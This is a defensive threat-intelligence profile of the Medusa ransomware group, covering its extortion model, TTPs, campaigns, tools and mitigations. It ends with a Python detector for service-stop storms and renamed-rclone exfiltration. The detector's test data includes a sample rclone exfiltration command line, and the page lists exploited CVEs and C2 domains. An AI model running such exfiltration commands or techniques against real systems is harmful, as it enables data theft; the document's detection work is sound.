Medusa
Medusa is a Ransomware-as-a-Service operation first identified in June 2021 that has claimed over 300 victims across critical infrastructure sectors and nearly doubled its attack volume in early 2025. The group is distinguished by a publicly accessible Telegram channel for victim data leaks, a pay-to-delay countdown timer ($10,000 USD per 24-hour extension), and a documented case of triple extortion — where a victim who paid the ransom was contacted by a second Medusa actor demanding additional payment for the "true decryptor." The CISA/FBI/MS-ISAC joint advisory was issued March 12, 2025.
Overview
Medusa emerged in June 2021 but operated quietly for its first two years before gaining significant visibility in 2023 with high-profile attacks on Minneapolis Public Schools and Toyota Financial Services. Originally a closed operation — all development and attack execution handled by the same core group — Medusa made a strategic pivot to a RaaS affiliate model in mid-2024, outsourcing initial access while retaining centralized control over the critical and most profitable component: ransom negotiation.
The IAB recruitment model is distinctive. Rather than building a traditional affiliate program where attackers pay to join, Medusa pays initial access brokers between $100 and $1 million USD for exclusive access to compromised networks — removing the initial access burden from the core team entirely and allowing operators to focus on encryption, exfiltration, and negotiation. In 2024, more than 26% of Medusa's disclosed attacks involved ransom demands exceeding $1 million USD, with demands ranging from $100,000 to $15 million and averaging approximately $1.2 million across documented incidents. Total operations have surpassed $40 million in ransom demands.
Medusa is unrelated to MedusaLocker ransomware, the Medusa mobile malware variant, and Operation Medusa (a 2023 law enforcement action against the Snake malware network). The FBI explicitly confirmed this in advisory AA25-071A. The confusion between these distinct threats is a persistent operational intelligence problem — organizations should treat them as entirely separate actors with no shared infrastructure, tooling, or operators.
The group's extortion infrastructure is operationally unusual for a ransomware group in its use of public, clearnet-accessible channels alongside dark web infrastructure. The "Medusa Blog" on Tor lists victims with countdown timers and ransom demands. A linked public Telegram channel titled "information support" — operated under the pseudonyms "Robert Vroofdown" and "Robert Enaber" — has been used to leak victim data publicly, making Medusa one of the few ransomware operations to actively maintain a clearnet presence for victim shaming. The group also maintains Facebook and X accounts under the OSINT Without Borders brand, though these are primarily used for reputation amplification rather than operational data release.
Medusa's attack volume nearly doubled in January and February 2025 compared to the same period in 2024 — a trajectory Symantec's Spearwing tracking confirmed, noting a 42% increase in incidents from 2023 to 2024 followed by further acceleration. In the UK, Medusa accounted for 9% of all reported ransomware victims in Q1 2025 — significantly above its 2% global share — suggesting either concentrated UK affiliate activity or systematic targeting of UK healthcare and insurance organizations.
The CISA/FBI advisory documents a confirmed case where a victim who paid Medusa's ransom was subsequently contacted by a second Medusa actor claiming the original negotiator had stolen the ransom payment and requesting half the amount again to receive the "true decryptor." This is not a theoretical risk — it is a documented FBI investigation finding. Paying Medusa does not guarantee decryption and may invite a second extortion demand. This should factor explicitly into any incident response decision on whether to engage with ransom payment.
Target Profile
Medusa targets organizations of opportunity, with consistent overrepresentation of sectors where data sensitivity, regulatory exposure, and operational dependency on uptime create maximum payment pressure.
- Healthcare and Medical: The primary growth sector through 2024–2025. Hospitals, health systems, and healthcare insurers face life-safety pressure and HIPAA regulatory exposure. The Comcast attack in 2025 — where Medusa claimed 834.4 GB of data and demanded $1.2 million — and multiple hospital network attacks demonstrate the group's willingness to target organizations where operational disruption directly affects patient care.
- Education: Minneapolis Public Schools (2023) was the attack that first brought Medusa to widespread attention. The breach exposed sensitive student records for over 100,000 individuals. School districts and universities hold decades of sensitive PII across large distributed networks with limited security budgets — a profile that mirrors Vice Society's historical education targeting and drives consistent school sector attacks.
- Legal and Insurance: Law firms and insurance companies hold extraordinarily sensitive client data including medical records, litigation strategy, financial information, and confidential settlements. The regulatory and reputational consequences of a public breach in these sectors are severe, driving payment consideration even when technical recovery is possible.
- Technology and Manufacturing: SMBs in these sectors are preferred targets — large enough to pay meaningful ransoms, but lacking the security maturity of enterprise-scale organizations. Toyota Financial Services (2023) was the high-profile exception demonstrating Medusa's capacity against global corporations when access is available.
- Government and Public Sector: Municipal governments, public school districts, and transportation agencies appear across the victim portfolio. Public sector organizations face political accountability pressure and serve populations that depend on continuous service, heightening payment urgency. In France, the Philippines, Illinois, and Texas, government agencies have all been confirmed victims.
Tactics, Techniques & Procedures
TTPs are sourced from the CISA/FBI/MS-ISAC joint advisory AA25-071A (March 12, 2025) and from Palo Alto Unit 42 and Symantec Spearwing tracking reports. Medusa's LOTL-heavy approach and reliance on legitimate tools make it particularly resistant to signature-based detection.
| MITRE ID | Technique | Description |
|---|---|---|
| T1190 | Exploit Public-Facing Application | IABs exploit documented CVEs for initial access. CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0); CVE-2023-48788 (Fortinet EMS SQL injection, CVSS 9.8); ProxyShell Microsoft Exchange vulnerabilities (CVE-2021-34473); CVE-2025-10035 (GoAnywhere MFT License Servlet deserialization, CVSS 10.0, exploited as a zero-day by Medusa in 2025 per Microsoft research). A significant 2025 addition: Medusa exploited SimpleHelp RMM vulnerabilities CVE-2024-57726 (privilege escalation, CVSS 9.9), CVE-2024-57727 (path traversal enabling unauthenticated file download, CVSS 7.5), and CVE-2024-57728 (arbitrary file upload leading to RCE, CVSS 7.2) to compromise MSP-managed SimpleHelp servers and redirect their RMM agents to attacker-controlled C2 infrastructure — pivoting into downstream customer environments through trusted management channels. CISA added CVE-2024-57727 to its KEV catalog on February 13, 2025, and issued a dedicated advisory (AA25-163A) on SimpleHelp exploitation by ransomware actors. Patches for all three SimpleHelp CVEs were available in version 5.5.8 before active exploitation began. |
| T1566 | Phishing | Primary credential theft method used by IABs before selling network access to Medusa. Phishing campaigns target employee credentials for VPN, email, and remote access platforms. Credential stuffing using purchased breach data supplements phishing for initial access to organizations with reused passwords. |
| T1046 | Network Service Discovery | Advanced IP Scanner and SoftPerfect Network Scanner used for initial user, system, and network enumeration post-access. Scanned ports include FTP (21), SSH (22), Telnet (23), HTTP (80), SFTP (115), HTTPS (443), SQL (1433), Firebird (3050), HTTP proxy (3128), MySQL (3306), and RDP (3389) — a comprehensive port scan profile covering all potential lateral movement vectors. |
| T1059.001 | PowerShell | Extensive PowerShell use across all phases: network and filesystem enumeration, defense evasion through increasingly complex obfuscation, file identification for exfiltration, and payload staging. The CISA advisory documents PowerShell command history as an investigation artifact and notes that actors delete it post-operation. |
| T1047 | Windows Management Instrumentation | WMI used for system information querying, remote command execution, and persistence. Combined with PowerShell in a LOTL approach that avoids deploying purpose-built malware for reconnaissance and lateral movement. |
| T1021.001 | Remote Services: RDP | RDP used for lateral movement alongside legitimate RMM tools. Medusa actors select whichever remote access tool is already present in the victim environment — AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop have all been documented — to blend with legitimate administrator activity and evade detection based on unexpected tool introduction. |
| T1003 | OS Credential Dumping | Mimikatz used for credential harvesting from LSASS memory, providing domain-wide credential access for unrestricted lateral movement. Certutil.exe (a native Windows binary) used as a LOTL technique for file ingress to avoid triggering download-based detection. |
| T1562.001 | Impair Defenses: Disable or Modify Tools | Windows Defender and antivirus services disabled on specific targets before gaze.exe deployment. BYOVD technique documented: the ABYSSWORKER driver — a malicious signed kernel driver — is loaded to disable EDR at the kernel level, bypassing endpoint protection that cannot be reached by user-mode processes. This is a significant technical capability elevating Medusa beyond standard ransomware operators. |
| T1041 | Exfiltration Over C2 Channel | Rclone used to exfiltrate data to Medusa-controlled C2 servers before encryption. In documented 2025 incidents, Medusa renamed rclone as lsp.exe to avoid detection by filename-based controls (Zensec / GBHackers). Data is identified for exfiltration via PowerShell filesystem enumeration. The stolen data serves double extortion (publication threat) and is simultaneously auctioned to third parties on the Medusa Blog while the countdown timer runs. Darktrace additionally documented Medusa abusing Cloudflare tunnels for C2 (connections to region1.v2.argotunnel[.]com, region2.v2.argotunnel[.]com, h2.cftunnel[.]com) — leveraging Cloudflare's legitimate infrastructure to create rate-limited tunnels that bypass static blocklists and blend with legitimate web traffic. |
| T1486 | Data Encrypted for Impact | gaze.exe is the Medusa ransomware encryptor. It terminates services related to backups, security tools, databases, communications, file sharing, and websites. Deletes VSS shadow copies. Encrypts files with AES-256 and appends the .medusa extension. Drops ransom note !!!READ_ME_MEDUSA!!!.txt in each directory. Manually powers off and encrypts virtual machines. Deletes previously installed attack tools post-encryption to impede forensic analysis. |
| T1070 | Indicator Removal | Post-encryption cleanup: actors delete remote access software, reconnaissance tools, credential dumping utilities, and exfiltration tools. PowerShell command history deleted. This cleanup reduces the forensic footprint available to incident responders and hampers attribution across separate Medusa incidents. |
Known Campaigns
Selected confirmed and highly attributed incidents from Medusa's escalating campaign history.
Medusa's attack on Minneapolis Public Schools (MPS) — one of the largest school districts in Minnesota — exposed sensitive records for over 100,000 students, staff, and families. When MPS declined to pay the ransom, Medusa published the full stolen dataset publicly, including Social Security numbers, financial records, psychological evaluations, and details of disciplinary incidents involving minors. The group livestreamed the data publication countdown on their Telegram channel. The attack generated national attention both for its scale and for the disturbing nature of the student data exposed — including behavioral and mental health records. Recovery costs and remediation efforts consumed significant district resources for months after the incident.
Medusa claimed a breach of Toyota Financial Services, the automotive giant's financial subsidiary operating across Europe and Africa. The group exfiltrated sensitive financial and customer data and listed it on the Medusa Blog, threatening to release the full dataset unless Toyota paid. Toyota confirmed a cyberattack and took systems offline in affected regions. The incident demonstrated Medusa's capability and willingness to target Fortune Global 500 companies — not just SMBs — when access is available through an IAB.
Medusa claimed a ransomware attack on Comcast Corporation — one of the world's largest media and technology companies — stealing 834.4 GB of company data. Medusa listed the stolen data on its leak site with a $1.2 million ransom demand, threatening public release if unpaid. The group's willingness to target a company of Comcast's scale and public profile underscores the increasing ambition of Medusa operations following the mid-2024 RaaS expansion.
Medusa attacked HCRG Care Group, one of the UK's largest independent providers of community health and social care services. The breach resulted in a London High Court injunction against DataBreaches.net — a cybersecurity journalism site — to prevent publication of details about the breach, which the US-based site ultimately disregarded on jurisdictional grounds. The legal attempt to suppress reporting on the breach drew significant attention and highlighted the tension between ransomware victims' legal tools and public interest journalism covering healthcare security.
Medusa attacked Gateshead Council in northeast England and published exfiltrated data publicly. The attack was part of a surge in UK-focused Medusa activity in early 2025 that saw the group account for 9% of all UK ransomware victims in Q1 — far above its 2% global share — suggesting concentrated affiliate activity against UK public sector and healthcare targets.
Tools & Malware
- gaze.exe (encryptor): Medusa's primary ransomware binary. Terminates services for backups (Veeam), security tools (antivirus, EDR), databases (SQL, MySQL, Firebird), communications, file sharing, and websites before encrypting. Deletes VSS shadow copies. AES-256 file encryption; appends .medusa extension. Drops !!!READ_ME_MEDUSA!!!.txt ransom note per directory. Manually powers off and encrypts VMs. Deletes itself and previously installed tools post-encryption. Deployed via Sysinternals PsExec, PDQ Deploy, or BigFix for mass deployment across domain systems.
- ABYSSWORKER (BYOVD driver): A malicious signed kernel driver used to disable EDR solutions at the kernel level — documented by Halcyon in Medusa operations. BYOVD bypasses user-mode endpoint protection by operating at the kernel privilege level where most EDR agents have no visibility. This capability represents a significant technical escalation beyond standard ransomware groups.
- Rclone: Legitimate open-source cloud sync tool used for data exfiltration to Medusa C2 servers. Selection of a legitimate, widely used tool avoids triggering malware signature detections during the exfiltration phase.
- Mimikatz: Standard Windows credential dumping tool for LSASS memory extraction, providing domain-wide credential access for lateral movement without deploying a custom credential stealer.
- Advanced IP Scanner / SoftPerfect Network Scanner / netscan.exe: Legitimate network scanning tools used for post-access enumeration of the victim environment. netscan.exe was additionally documented by Zensec in Medusa's SimpleHelp-exploitation incidents for enumerating hosts and prioritizing high-value targets including domain controllers, file servers, and backup infrastructure.
- AnyDesk / Atera / ConnectWise / eHorus / MeshAgent / N-able / NinjaOne / Navicat / PDQ Deploy / SimpleHelp / Splashtop / TeamViewer: Legitimate RMM tools used for lateral movement and persistent access. Medusa selects whichever tool is already present in the victim environment rather than introducing new software — a LOTL approach that makes detection based on unexpected tool installation ineffective. SimpleHelp is particularly favored: Medusa compromises SimpleHelp management servers via the CVE-2024-57726/57727/57728 chain, then edits server configuration files to redirect existing SimpleHelp RMM agents to attacker-controlled C2 infrastructure — hijacking the management trust relationship rather than deploying a new implant.
- Medusa Blog (dark web DLS): Tor-hosted data leak site listing victim names, exfiltrated data samples, ransom demands with cryptocurrency wallet links, victim descriptions, and countdown timers. Simultaneously advertises data for third-party sale. Victims can pay $10,000 USD per 24-hour countdown extension. Victims can pay to have their listing removed entirely. The site displays visitor counts per victim listing as an additional psychological pressure tactic.
- Telegram channel ("information support"): A public clearnet Telegram channel operated under OSINT Without Borders branding used to leak victim data publicly, making it more accessible than the Tor DLS. Created July 2021. Makes Medusa one of the few ransomware operations maintaining a public internet presence for victim shaming.
Indicators of Compromise
IOCs are taken from CISA advisory AA25-071A (March 12, 2025); the full tables of IP addresses, domains, email accounts, and file hashes are in the advisory PDF at ic3.gov/CSA/2025/250312.pdf. ConnectWise contributed to the advisory and reviewed field IOCs.
Medusa IABs use diverse initial access methods, so IOCs tied to specific IAB infrastructure rotate rapidly and are not Medusa-specific. The behavioral indicators in the Mitigation & Defense section are more durable for detection purposes than network indicators. The full advisory at cisa.gov/news-events/cybersecurity-advisories/aa25-071a contains the current network IOC tables from FBI investigations through February 2025.
Mitigation & Defense
Medusa's IAB-driven initial access model means the attack chain starts with a credential compromise or vulnerability exploit — often weeks before Medusa actors receive the access. Fixing the initial access vector closes the door before Medusa ever enters.
- Patch SimpleHelp RMM immediately to version 5.5.8 or later: CVE-2024-57727 (SimpleHelp path traversal, CVSS 7.5) was added to CISA's KEV catalog on February 13, 2025 and is actively exploited by Medusa in supply-chain attacks against MSP environments. Medusa exploits CVE-2024-57727 combined with CVE-2024-57728 to gain administrative control of SimpleHelp management servers, then redirects existing SimpleHelp agents to attacker-controlled C2 — pivoting through the legitimate management trust relationship into downstream client environments without deploying a new implant. If your organization uses SimpleHelp or is managed by an MSP that does, verify the server version immediately. CISA also issued a dedicated advisory (AA25-163A) on SimpleHelp exploitation by ransomware actors. Any SimpleHelp instance running version 5.5.7 or earlier that is internet-accessible should be treated as potentially compromised regardless of indicator presence.
- Patch ConnectWise ScreenConnect and Fortinet EMS immediately: CVE-2024-1709 (ScreenConnect authentication bypass, CVSS 10.0) and CVE-2023-48788 (Fortinet EMS SQL injection, CVSS 9.8) are documented Medusa initial access vectors. Both have patches available. Any organization running unpatched versions of these products in internet-facing configurations is actively exposed to Medusa IAB compromise. Treat CVSS 9.0+ vulnerabilities in remote access tools as P0 patches with 24–48 hour remediation windows.
- Enforce MFA on all remote access and VPN: Phishing-harvested credentials are the primary IAB initial access method. Phishing-resistant MFA (FIDO2/passkeys) prevents credential replay attacks. Standard TOTP provides partial protection. Any remote access portal accessible from the internet without MFA is an active IAB procurement target.
- Monitor for ABYSSWORKER driver loads: The BYOVD technique using the ABYSSWORKER signed driver requires an unusual kernel driver load. Alert on any new kernel driver installation that is not part of an approved patch or software deployment cycle. Kernel driver change control is essential for detecting BYOVD-based EDR circumvention before encryption begins.
- Alert on mass service termination events: gaze.exe terminates backup, security, database, and communication services before encryption. A sudden storm of service stop events — particularly targeting Veeam backup services, antivirus processes, and SQL services — is a reliable pre-encryption signal. Configure SIEM rules to alert on more than N service stop events within a short time window, with escalation rather than queuing for review.
- Audit all legitimate RMM tool installations: Medusa selects whichever RMM tool is already in the environment for lateral movement. Maintain a strict allowlist of approved remote access software. Alert on any RMM installation (AnyDesk, SimpleHelp, eHorus, etc.) not matching the approved list. Medusa's use of pre-existing tools makes this alert high-fidelity — the tool was there legitimately, but the process that ran it may not have been.
- Monitor Rclone execution and behavior regardless of process name: Alert on rclone.exe execution on systems where it is not approved software. Medusa has been documented renaming rclone as lsp.exe to bypass filename-based detections — alert on rclone behavioral signatures (cloud storage upload patterns, large outbound data volumes) independently of process name. Alert on connections to known Medusa exfiltration endpoints including erp.ranasons[.]com and pruebas.pintacuario[.]mx.
- Do not pay the ransom without legal and IR counsel: The documented triple extortion case — where a paying victim was contacted for a second payment to receive the "true decryptor" — makes ransom payment a poor assumption for recovery planning. Organizations in sectors where Medusa is active (healthcare, education, legal) should have offline or immutable backup recovery capabilities sufficient to operate without the decryptor. Any ransom payment decision should involve legal counsel, IR specialists, and awareness that payment does not guarantee decryption and may trigger further extortion.
- Segment backup infrastructure from production networks: gaze.exe explicitly targets Veeam backup services before encryption. Backup servers accessible from production domain networks will be enumerated and targeted. Backup credentials must not be stored or accessible from production systems. Offline or air-gapped backup copies are the only reliable post-encryption recovery mechanism.
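Two of the pre-encryption signals from the list above, the service-stop storm and the renamed-rclone case, implemented as an added example in Python over constructed Windows event records; this is not code from the advisory or any vendor, and the record formats, keyword lists and thresholds are assumptions.

```python
"""Detection logic for two signals listed above: (1) a burst of Service Control
Manager EID 7036 stop events hitting backup/security/database services, and
(2) rclone exfiltration recognised by command-line structure rather than file
name, so a copy renamed lsp.exe is still caught. Added example, not code from
the advisory or any vendor; record formats, thresholds and samples are assumed."""
import re
from datetime import datetime, timedelta

# Service-name fragments drawn from the gaze.exe behaviour described on this page.
TARGETED_SERVICE_KEYWORDS = ("veeam", "sql", "firebird", "defender", "backup")
STOPPED_RE = re.compile(r"^The (?P<svc>.+?) service entered the stopped state\.$")

# Constructed EID 7036 records: (host, timestamp, message)
STOP_EVENTS = [
    ("FS01", "2025-02-10T22:01:03", "The Veeam Backup Service service entered the stopped state."),
    ("FS01", "2025-02-10T22:01:04", "The SQL Server (MSSQLSERVER) service entered the stopped state."),
    ("FS01", "2025-02-10T22:01:04", "The Microsoft Defender Antivirus Service service entered the stopped state."),
    ("FS01", "2025-02-10T22:01:05", "The MySQL80 service entered the stopped state."),
    ("FS01", "2025-02-10T22:01:06", "The Firebird Server service entered the stopped state."),
    ("WS07", "2025-02-10T08:15:00", "The Print Spooler service entered the stopped state."),
    ("WS07", "2025-02-10T13:40:11", "The Windows Update service entered the stopped state."),
]


def service_stop_storms(events, window_s=120, min_stops=4):
    """Return {host: [stopped services]} for hosts where at least min_stops
    targeted services stop within window_s seconds of each other."""
    per_host = {}
    for host, ts, msg in events:
        m = STOPPED_RE.match(msg)
        if m and any(k in m["svc"].lower() for k in TARGETED_SERVICE_KEYWORDS):
            per_host.setdefault(host, []).append((datetime.fromisoformat(ts), m["svc"]))
    storms = {}
    for host, stops in per_host.items():
        stops.sort()
        for i, (t0, _) in enumerate(stops):
            burst = [s for t, s in stops[i:] if t - t0 <= timedelta(seconds=window_s)]
            if len(burst) >= min_stops:
                storms[host] = burst  # escalate: this is the pre-encryption window
                break
    return storms


# rclone-specific command-line structure: subcommand, "remote:path" operand, flags.
RCLONE_SUBCMDS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_FLAGS = {"--transfers", "--config", "--bwlimit", "--progress", "-P", "--ignore-existing"}
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:\S*$")  # two+ chars excludes C:\ style drive paths

# Constructed process-creation records (Sysmon EID 1 / 4688 style): (image, command line)
PROC_EVENTS = [
    (r"C:\Windows\Temp\lsp.exe", r'lsp.exe copy "D:\Finance" exfil:share --transfers 32 --config C:\Windows\Temp\r.conf'),
    (r"C:\Program Files\rclone\rclone.exe", r"rclone.exe sync \\fs01\hr backup:hr -P"),
    (r"C:\Windows\System32\robocopy.exe", r"robocopy D:\Finance E:\Archive /MIR"),
    (r"C:\Windows\System32\lsass.exe", "lsass.exe"),
]


def looks_like_rclone(command_line):
    """Two of three rclone-specific traits on the command line count as a hit."""
    tokens = command_line.split()
    has_subcmd = len(tokens) > 1 and tokens[1] in RCLONE_SUBCMDS
    has_remote = any(REMOTE_RE.match(t) for t in tokens[2:])
    has_flag = any(t in RCLONE_FLAGS for t in tokens)
    return has_subcmd + has_remote + has_flag >= 2


def rclone_findings(events):
    """Flag rclone-shaped command lines and note whether the binary was renamed."""
    out = []
    for image, cmd in events:
        if looks_like_rclone(cmd):
            renamed = not image.lower().endswith("rclone.exe")
            out.append((image, "renamed" if renamed else "rclone.exe"))
    return out
```

The rclone check deliberately ignores the image name, so the lsp.exe record is caught on the same evidence as the unrenamed binary.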
Sources & Further Reading
- Darktrace — Under Medusa's Gaze: RMM Abuse, SimpleHelp Exploitation, Cloudflare Tunnels (January 2026)
- S-RM Intelligence — Cyber Threat Advisory: Medusa and the SimpleHelp Vulnerability (April 2025)
- CISA Advisory AA25-163A — Ransomware Actors Exploit Unpatched SimpleHelp RMM (June 2025)
- CISA / FBI / MS-ISAC — #StopRansomware: Medusa Ransomware, Advisory AA25-071A (March 12, 2025)
- Palo Alto Unit 42 — Medusa Ransomware: Multi-Extortion Operation and Leak Site Analysis (2024)
- The Register — Medusa Ransomware Infects 300+, Uses Triple Extortion (March 2025)
- Recorded Future News — CISA: More Than 300 Critical Infrastructure Orgs Attacked by Medusa Ransomware (March 2025)
- Barracuda Networks — Medusa Ransomware and Its Cybercrime Ecosystem (August 2025)
- Check Point — Medusa Ransomware Group: A Rising Threat in 2025 (2025)
- SC World — Medusa Rises from Obscurity to RaaS Powerhouse (April 2025)
- Halcyon — Medusa Threat Group Profile (includes ABYSSWORKER driver documentation)
- Picus Security — Medusa Ransomware Analysis, Simulation, and Mitigation (March 2025)